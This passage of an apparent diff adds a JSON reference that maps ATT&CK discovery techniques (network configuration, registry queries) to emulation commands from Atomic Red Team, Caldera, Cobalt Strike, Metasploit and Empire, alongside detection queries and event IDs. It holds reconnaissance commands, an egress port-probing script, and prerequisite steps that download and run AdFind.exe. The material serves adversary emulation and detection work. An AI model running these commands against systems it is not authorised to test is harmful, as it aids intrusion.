"https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Metasploit" + }, + { + "command": "nbtstat -a {IP | COMP_NAME }", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Built-in Windows Command" + }, + { + "command": "shell c:\\windows\\sysnative\\nbstat.exe -a {IP | COMP_NAME}", + "source": "https://attack.mitre.org/docs/APT3_Adversary_Emulation_Field_Manual.xlsx", + "name": "Cobalt Strike" + }, + { + "command": "ipconfig /all\nnetsh interface show interface\narp -a\nnbtstat -n\nnet config\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "netsh advfirewall firewall show rule name=all\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "ipconfig /all\nnet config workstation\nnet view /all /domain\nnltest /domain_trusts\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "$ports = Get-content #{port_file}\n$file = \"$env:USERPROFILE\\Desktop\\open-ports.txt\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "$ports = Get-content #{port_file}\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "$ports = Get-content PathToAtomicsFolder\\T1016\\src\\top-128.txt\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe -f (objectcategory=subnet)\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "PathToAtomicsFolder\\T1016\\src\\qakbot.bat\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "sudo defaults read /Library/Preferences/com.apple.alf\nsudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate\n", + "source": "atomics/T1016/T1016.yaml", + "name": "Atomic Red Team Test - System Network Configuration Discovery" + }, + { + "command": "nbtstat -n\n", + "source": "data/abilities/discovery/14a21534-350f-4d83-9dd7-3c56b93a0c17.yml", + "name": "Find Domain information" + }, + { + "command": "ping #{remote.host.fqdn}\n", + "source": "data/abilities/discovery/921055f4-5970-4707-909e-62f594234d91.yml", + "name": "Ping a remote host to see if it is accessible" + }, + { + "command": "./#{payload:9f639067-370a-40ba-b7ac-6f1c15d5a158} scan\n", + "source": "data/abilities/discovery/9a30740d-3aa8-4c23-8efa-d51215e8a5b9.yml", + "name": "View all potential WIFI networks on host" + }, + { + "command": ".\\#{payload:28f9bf43-4f14-4965-9bd9-b70fd6993d8e} -Scan\n", + "source": "data/abilities/discovery/9a30740d-3aa8-4c23-8efa-d51215e8a5b9.yml", + "name": "View all potential WIFI networks on host" + }, + { + "command": "./wifi.sh pref\n", + "source": "data/abilities/discovery/a0676fe1-cd52-482e-8dde-349b73f9aa69.yml", + "name": "See the most used WIFI networks of a machine" + }, + { + "command": ".\\wifi.ps1 -Pref\n", + "source": "data/abilities/discovery/a0676fe1-cd52-482e-8dde-349b73f9aa69.yml", + "name": "See the most used WIFI networks of a machine" + }, + { + "command": "for ip in $(seq 190 199); do ping -c 1 $(echo #{domain.broadcast.ip} |\ncut -d. -f-3).$ip -W 1; done\n", + "source": "data/abilities/discovery/ac9dce33-2acc-4b34-94ce-2596409ce8f0.yml", + "name": "Ping the network in order to build the ARP cache" + }, + { + "command": "ifconfig | grep broadcast", + "source": "data/abilities/discovery/b6f545ef-f802-4537-b59d-2cb19831c8ed.yml", + "name": "Capture the local network broadcast IP address" + }, + { + "command": "sudo ifconfig\n", + "source": "data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml", + "name": "View network configuration info for host" + }, + { + "command": "ipconfig\n", + "source": "data/abilities/discovery/e8017c46-acb8-400c-a4b5-b3362b5b5baa.yml", + "name": "View network configuration info for host" + }, + { + "command": "powershell/situational_awareness/host/dnsserver", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/host/get_proxy", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/arpscan", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + }, + { + "command": "powershell/situational_awareness/network/powerview/get_subnet", + "source": "https://github.com/dstepanic/attck_empire/blob/master/Empire_modules.xlsx?raw=true", + "name": "Empire Module Command" + } + ], + "parsed_datasets": [ + { + "Category": "T1016", + "Built-in Windows Command": "ipconfig /all", + "Cobalt Strike": "shell ipconfig", + "Metasploit": "ipconfig\npost/windows/gather/enum_domains", + "Description": "Get information about the domain, network adapters, DNS / WSUS servers" + }, + { + "Category": "T1016", + "Built-in Windows Command": "arp -a\nroute print", + "Cobalt Strike": "shell arp -a", + "Metasploit": "route", + "Description": "Display the ARP table" + }, + { + "Category": "T1016", + "Built-in Windows Command": "nbtstat -a {IP | COMP_NAME }", + "Cobalt Strike": "shell c:\\windows\\sysnative\\nbstat.exe -a {IP | COMP_NAME}", + "Metasploit": "", + "Description": "Used to get the MAC and IP addresses as well as some descriptive codes for machines (0x1C indicates a domain controller)" + }, + { + "attack_technique": "T1016", + "display_name": "System Network Configuration Discovery", + "atomic_tests": [ + { + "name": "System Network Configuration Discovery on Windows", + "auto_generated_guid": "970ab6a1-0157-4f3f-9a73-ec4166754b23", + "description": "Identify network configuration information\n\nUpon successful execution, cmd.exe will spawn multiple commands to list network configuration settings. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "ipconfig /all\nnetsh interface show interface\narp -a\nnbtstat -n\nnet config\n", + "name": "command_prompt" + } + }, + { + "name": "List Windows Firewall Rules", + "auto_generated_guid": "038263cb-00f4-4b0a-98ae-0696c67e1752", + "description": "Enumerates Windows Firewall Rules using netsh.\n\nUpon successful execution, cmd.exe will spawn netsh.exe to list firewall rules. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "netsh advfirewall firewall show rule name=all\n", + "name": "command_prompt" + } + }, + { + "name": "System Network Configuration Discovery", + "auto_generated_guid": "c141bbdb-7fca-4254-9fd6-f47e79447e17", + "description": "Identify network configuration information.\n\nUpon successful execution, sh will spawn multiple commands and output will be via stdout.\n", + "supported_platforms": [ + "macos", + "linux" + ], + "dependency_executor_name": "sh", + "dependencies": [ + { + "description": "Check if arp command exists on the machine\n", + "prereq_command": "if [ -x \"$(command -v arp)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "(which yum && yum -y install net-tools)||(which apt-get && DEBIAN_FRONTEND=noninteractive apt-get install -y net-tools)\n" + } + ], + "executor": { + "command": "if [ -x \"$(command -v arp)\" ]; then arp -a; else echo \"arp is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ifconfig)\" ]; then ifconfig; else echo \"ifconfig is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v ip)\" ]; then ip addr; else echo \"ip is missing from the machine. skipping...\"; fi;\nif [ -x \"$(command -v netstat)\" ]; then netstat -ant | awk '{print $NF}' | grep -v '[a-z]' | sort | uniq -c; else echo \"netstat is missing from the machine. skipping...\"; fi;\n", + "name": "sh" + } + }, + { + "name": "System Network Configuration Discovery (TrickBot Style)", + "auto_generated_guid": "dafaf052-5508-402d-bf77-51e0700c02e2", + "description": "Identify network configuration information as seen by Trickbot and described here https://www.sneakymonkey.net/2019/10/29/trickbot-analysis-part-ii/\n\nUpon successful execution, cmd.exe will spawn `ipconfig /all`, `net config workstation`, `net view /all /domain`, `nltest /domain_trusts`. Output will be via stdout.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "ipconfig /all\nnet config workstation\nnet view /all /domain\nnltest /domain_trusts\n", + "name": "command_prompt" + } + }, + { + "name": "List Open Egress Ports", + "auto_generated_guid": "4b467538-f102-491d-ace7-ed487b853bf5", + "description": "This is to test for what ports are open outbound. The technique used was taken from the following blog:\nhttps://www.blackhillsinfosec.com/poking-holes-in-the-firewall-egress-testing-with-allports-exposed/\n\nUpon successful execution, powershell will read top-128.txt (ports) and contact each port to confirm if open or not. Output will be to Desktop\\open-ports.txt.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "output_file": { + "description": "Path of file to write port scan results", + "type": "Path", + "default": "$env:USERPROFILE\\Desktop\\open-ports.txt" + }, + "portfile_url": { + "description": "URL to top-128.txt", + "type": "Url", + "default": "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1016/src/top-128.txt" + }, + "port_file": { + "description": "The path to a text file containing ports to be scanned, one port per line. The default list uses the top 128 ports as defined by Nmap.", + "type": "Path", + "default": "PathToAtomicsFolder\\T1016\\src\\top-128.txt" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "Test requires #{port_file} to exist\n", + "prereq_command": "if (Test-Path \"#{port_file}\") {exit 0} else {exit 1}\n", + "get_prereq_command": "New-Item -Type Directory (split-path #{port_file}) -ErrorAction ignore | Out-Null\nInvoke-WebRequest \"#{portfile_url}\" -OutFile \"#{port_file}\"\n" + } + ], + "executor": { + "command": "$ports = Get-content #{port_file}\n$file = \"#{output_file}\"\n$totalopen = 0\n$totalports = 0\nNew-Item $file -Force\nforeach ($port in $ports) {\n $test = new-object system.Net.Sockets.TcpClient\n $wait = $test.beginConnect(\"allports.exposed\", $port, $null, $null)\n $wait.asyncwaithandle.waitone(250, $false) | Out-Null\n $totalports++ | Out-Null\n if ($test.Connected) {\n $result = \"$port open\" \n Write-Host -ForegroundColor Green $result\n $result | Out-File -Encoding ASCII -append $file\n $totalopen++ | Out-Null\n }\n else {\n $result = \"$port closed\" \n Write-Host -ForegroundColor Red $result\n $totalclosed++ | Out-Null\n $result | Out-File -Encoding ASCII -append $file\n }\n}\n$results = \"There were a total of $totalopen open ports out of $totalports ports tested.\"\n$results | Out-File -Encoding ASCII -append $file\nWrite-Host $results\n", + "cleanup_command": "Remove-Item -ErrorAction ignore \"#{output_file}\"\n", + "name": "powershell" + } + }, + { + "name": "Adfind - Enumerate Active Directory Subnet Objects", + "auto_generated_guid": "9bb45dd7-c466-4f93-83a1-be30e56033ee", + "description": "Adfind tool can be used for reconnaissance in an Active directory environment. This example has been documented by ransomware actors enumerating Active Directory Subnet Objects\nreference- http://www.joeware.net/freetools/tools/adfind/, https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "adfind_path": { + "description": "Path to the AdFind executable", + "type": "Path", + "default": "PathToAtomicsFolder\\T1087.002\\src\\AdFind.exe" + } + }, + "dependency_executor_name": "powershell", + "dependencies": [ + { + "description": "AdFind.exe must exist on disk at specified location (#{adfind_path})\n", + "prereq_command": "if (Test-Path #{adfind_path}) {exit 0} else {exit 1}\n", + "get_prereq_command": "Invoke-WebRequest -Uri \"https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1087.002/src/AdFind.exe\" -OutFile #{adfind_path}\n" + } + ], + "executor": { + "command": "#{adfind_path} -f (objectcategory=subnet)\n", + "name": "command_prompt" + } + }, + { + "name": "Qakbot Recon", + "auto_generated_guid": "121de5c6-5818-4868-b8a7-8fd07c455c1b", + "description": "A list of commands known to be performed by Qakbot for recon purposes", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "recon_commands": { + "description": "File that houses list of commands to be executed", + "type": "Path", + "default": "PathToAtomicsFolder\\T1016\\src\\qakbot.bat" + } + }, + "executor": { + "command": "#{recon_commands}\n", + "name": "command_prompt" + } + }, + { + "name": "List macOS Firewall Rules", + "auto_generated_guid": "ff1d8c25-2aa4-4f18-a425-fede4a41ee88", + "description": "\"This will test if the macOS firewall is enabled and/or show what rules are configured. Must be run with elevated privileges. Upon successful execution, these commands will output various information about the firewall configuration, including status and specific port/protocol blocks or allows. \n\nUsing `defaults`, additional arguments can be added to see filtered details, such as `globalstate` for global configuration (\\\"Is it on or off?\\\"), `firewall` for common application allow rules, and `explicitauths` for specific rules configured by the user. \n\nUsing `socketfilterfw`, flags such as --getglobalstate or --listapps can be used for similar filtering. At least one flag is required to send parseable output to standard out. \n", + "supported_platforms": [ + "macos" + ], + "executor": { + "command": "sudo defaults read /Library/Preferences/com.apple.alf\nsudo /usr/libexec/ApplicationFirewall/socketfilterfw --getglobalstate\n", + "name": "bash", + "elevation_required": true + } + } + ] + }, + { + "id": "14a21534-350f-4d83-9dd7-3c56b93a0c17", + "name": "Find Domain", + "description": "Find Domain information", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "nbtstat -n\n", + "parsers": { + "plugins.stockpile.app.parsers.nbtstat": [ + { + "source": "network.domain.name" + } + ] + } + } + } + } + }, + { + "id": "921055f4-5970-4707-909e-62f594234d91", + "name": "Remote Host Ping", + "description": "Ping a remote host to see if it is accessible", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "windows": { + "psh": { + "command": "ping #{remote.host.fqdn}\n", + "parsers": { + "plugins.stockpile.app.parsers.firewallping": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + } + } + } + }, + "requirements": [ + { + "plugins.stockpile.app.requirements.not_exists": [ + { + "source": "remote.host.fqdn", + "edge": "isAccessibleFrom" + } + ] + } + ] + }, + { + "id": "9a30740d-3aa8-4c23-8efa-d51215e8a5b9", + "name": "Scan WIFI networks", + "description": "View all potential WIFI networks on host", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "./#{payload:9f639067-370a-40ba-b7ac-6f1c15d5a158} scan\n", + "payloads": [ + "9f639067-370a-40ba-b7ac-6f1c15d5a158" + ] + } + }, + "linux": { + "sh": { + "command": "./#{payload:9f639067-370a-40ba-b7ac-6f1c15d5a158} scan\n", + "payloads": [ + "9f639067-370a-40ba-b7ac-6f1c15d5a158" + ] + } + }, + "windows": { + "psh": { + "command": ".\\#{payload:28f9bf43-4f14-4965-9bd9-b70fd6993d8e} -Scan\n", + "payloads": [ + "28f9bf43-4f14-4965-9bd9-b70fd6993d8e" + ] + } + } + } + }, + { + "id": "a0676fe1-cd52-482e-8dde-349b73f9aa69", + "name": "Preferred WIFI", + "description": "See the most used WIFI networks of a machine", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "./wifi.sh pref\n", + "payloads": [ + "wifi.sh" + ], + "parsers": { + "plugins.stockpile.app.parsers.wifipref": [ + { + "source": "wifi.network.ssid" + } + ] + } + } + }, + "linux": { + "sh": { + "command": "./wifi.sh pref\n", + "payloads": [ + "wifi.sh" + ], + "parsers": { + "plugins.stockpile.app.parsers.wifipref": [ + { + "source": "wifi.network.ssid" + } + ] + } + } + }, + "windows": { + "psh": { + "command": ".\\wifi.ps1 -Pref\n", + "payloads": [ + "wifi.ps1" + ], + "parsers": { + "plugins.stockpile.app.parsers.wifipref": [ + { + "source": "wifi.network.ssid" + } + ] + } + } + } + } + }, + { + "id": "ac9dce33-2acc-4b34-94ce-2596409ce8f0", + "name": "Ping network", + "description": "Ping the network in order to build the ARP cache", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "for ip in $(seq 190 199); do ping -c 1 $(echo #{domain.broadcast.ip} |\ncut -d. -f-3).$ip -W 1; done\n" + } + } + } + }, + { + "id": "b6f545ef-f802-4537-b59d-2cb19831c8ed", + "name": "Snag broadcast IP", + "description": "Capture the local network broadcast IP address", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "ifconfig | grep broadcast" + } + } + } + }, + { + "id": "e8017c46-acb8-400c-a4b5-b3362b5b5baa", + "name": "Network Interface Configuration", + "description": "View network configuration info for host", + "tactic": "discovery", + "technique": { + "attack_id": "T1016", + "name": "System Network Configuration Discovery" + }, + "platforms": { + "darwin": { + "sh": { + "command": "sudo ifconfig\n" + } + }, + "linux": { + "sh": { + "command": "sudo ifconfig\n" + } + }, + "windows": { + "psh": { + "command": "ipconfig\n" + } + } + } + }, + { + "Empire Module": "powershell/situational_awareness/host/dnsserver", + "ATT&CK Technique #1": "T1016", + "ATT&CK Technique #2": "", + "Technique": "System Network Configuration Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/dnsserver\": [\"T1016\"]," + }, + { + "Empire Module": "powershell/situational_awareness/host/get_proxy", + "ATT&CK Technique #1": "T1016", + "ATT&CK Technique #2": "", + "Technique": "System Network Configuration Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/host/get_proxy\": [\"T1016\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/arpscan", + "ATT&CK Technique #1": "T1016", + "ATT&CK Technique #2": "", + "Technique": "System Network Configuration Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/arpscan\": [\"T1016\"]," + }, + { + "Empire Module": "powershell/situational_awareness/network/powerview/get_subnet", + "ATT&CK Technique #1": "T1016", + "ATT&CK Technique #2": "", + "Technique": "System Network Configuration Discovery", + "Concatenate for Python Dictionary": "\"powershell/situational_awareness/network/powerview/get_subnet\": [\"T1016\"]," + } + ], + "queries": [ + { + "product": "Azure Sentinel", + "query": "Sysmon| where EventID == 1 and (process_command_line contains \"net.exe\"and file_directory contains \"config\")or (process_command_line contains \"ipconfig.exe\"or process_command_line contains \"netsh.exe\"or process_command_line contains \"arp.exe\"or process_command_line contains \"nbtstat.exe\")", + "name": "System Network Configuration Discovery" + } + ], + "possible_detections": [ + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "200-500", + " 4100-4104", + "PowerShell" + ], + [ + "5861", + "WMI" + ], + [ + "4688", + "Process Execution" + ], + [ + "4688 ", + "Process CMD Line" + ], + [ + "5861", + "WMI" + ], + [ + "200-500", + " 4100-4104", + "PowerShell" + ], + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "user", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "process" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "process creation", + "description": "A process was created.", + "source_data_element": "process", + "relationship": "created", + "target_data_element": "thread" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "command", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "script", + "definition": "Information about executable script content, such as data provided by PowerShell logs and/or AMSI", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows" + ], + "data_component": "script execution", + "description": "Data and information that describe contents of an execution script", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "script" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "user", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "command", + "definition": "Information about commands that can be used through a command-line interface and/or script interpreter.", + "collection_layers": [ + "host", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "Network", + "Containers" + ], + "data_component": "command execution", + "description": "Information about commands executed through a command-line interface and/or script interpreter.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "command" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "api call" + }, + { + "data_source": "process", + "definition": "Information about instances of computer programs that are being executed by at least one thread.", + "collection_layers": [ + "host" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS" + ], + "data_component": "os api execution", + "description": "A process executed operating system api functions.", + "source_data_element": "process", + "relationship": "executed", + "target_data_element": "system call" + } + ], + "external_reference": [ + "https://www.pwc.co.uk/cyber-security/pdf/cloud-hopper-annex-b-final.pdf", + "https://researchcenter.paloaltonetworks.com/2017/02/unit42-magic-hound-campaign-attacks-saudi-targets/", + "https://media.kasperskycontenthub.com/wp-content/uploads/sites/43/2018/03/07205555/TheNaikonAPT-MsnMM1.pdf", + "https://www.fireeye.com/blog/threat-research/2015/11/china-based-threat.html", + "http://researchcenter.paloaltonetworks.com/2016/10/unit42-oilrig-malware-campaign-updates-toolset-and-expands-targets/", + "https://citizenlab.org/2016/05/stealth-falcon/", + "https://securelist.com/the-epic-turla-operation/65545/", + "https://researchcenter.paloaltonetworks.com/2016/01/new-attacks-linked-to-c0d0s0-group/", + "https://www.nccgroup.trust/uk/about-us/newsroom-and-events/blogs/2018/march/apt15-is-alive-and-strong-an-analysis-of-royalcli-and-royaldns/", + "https://securelist.com/darkhotels-attacks-in-2015/71713/", + "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf", + "https://operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Loaders-Installers-and-Uninstallers-Report.pdf", + "https://recon.cx/2017/montreal/resources/slides/RECON-MTL-2017-evolution_of_pirpi.pdf", + "http://www.symantec.com/connect/blogs/buckeye-cyberespionage-group-shifts-gaze-us-hong-kong", + "https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/wp-operation-ke3chang.pdf", + "https://www.us-cert.gov/ncas/alerts/TA18-074A", + "http://researchcenter.paloaltonetworks.com/2016/05/the-oilrig-campaign-attacks-on-saudi-arabian-organizations-deliver-helminth-backdoor/", + "https://www.fireeye.com/blog/threat-research/2019/01/apt39-iranian-cyber-espionage-group-focused-on-personal-information.html", + "https://cdn2.hubspot.net/hubfs/3354902/Cybereason%20Labs%20Analysis%20Operation%20Cobalt%20Kitty.pdf", + "https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf", + "https://www.secureworks.com/research/threat-group-3390-targets-organizations-for-cyberespionage", + "https://securelist.com/muddywater/88059/", + [ + "https://docs.microsoft.com/en-us/windows/win32/procthread/processes-and-threads" + ], + [ + "https://docs.microsoft.com/en-us/powershell/module/microsoft.powershell.core/about/about_logging_windows?view=powershell-7", + "https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html", + "https://docs.microsoft.com/en-us/windows/win32/amsi/antimalware-scan-interface-portal" + ], + [ + "https://tools.ietf.org/id/draft-ietf-opsawg-tacacs-07.html#rfc.section.7.2", + "https://tools.ietf.org/html/rfc2866" + ] + ] + }, + { + "technique_id": "T1012", + "command_list": [ + "reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections ", + "shell reg query \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" /v fDenyTSConnections", + "reg queryval -k \"HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\" -v fDenyTSConnections\npost/windows/gather/enum_termserv", + "reg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Windows\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\nreg query \"HKLM\\SOFTWARE\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Notify\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\Userinit\"\nreg query \"HKCU\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query \"HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Winlogon\\\\Shell\"\nreg query HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\ShellServiceObjectDelayLoad\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnceEx\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunOnce\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\Run\nreg query HKLM\\system\\currentcontrolset\\services /s | findstr ImagePath 2>nul | findstr /Ri \".*\\.sys$\"\nreg query HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\n", + "Get-ItemProperty -Path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\n", + "cmd.exe reg (query|add)", + "HKLM\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServicesOnce", + "HKLM\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices", + "HKLM\\Software\\Microsoft\\Windows 